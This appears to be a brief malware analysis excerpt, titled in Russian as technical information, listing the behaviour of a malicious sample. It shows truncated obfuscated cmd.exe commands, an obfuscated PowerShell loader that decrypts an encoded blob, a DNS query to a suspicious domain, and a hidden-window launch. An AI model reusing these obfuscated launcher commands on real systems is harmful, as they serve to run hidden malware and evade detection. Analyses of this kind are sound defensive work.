Техническая информация
- '<SYSTEM32>\cmd.exe' OEzuUijwI LYpaSiktKKzjQqXmiGkzHTuR aASDNajkijTs & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %afEjalpBwXoMdSq%=iQuHwRCrhv&&set %dGzKwYHIZXzoQI%=p&&set %jGiQRGWG...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "( &('nEw-'+'oBJeC'+'T') ('MAnaGEMe'+'NT.Au'+'toma'+'TioN.PScrEde'+'n'+'tiAl') ' ', ( '76492d1116743f0423413b16050a5345MgB8AEkALwBlAFUANwB4AEkAVQBOAGIARgAyAGEANwBmAFIAUgA2ADgAMQBvAFEAPQA9AHwAM...
- DNS ASK fq####heuisdqwe.com
- '<SYSTEM32>\cmd.exe' OEzuUijwI LYpaSiktKKzjQqXmiGkzHTuR aASDNajkijTs & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %afEjalpBwXoMdSq%=iQuHwRCrhv&&set %dGzKwYHIZXzoQI%=p&&set %jGiQRGWG...' (со скрытым окном)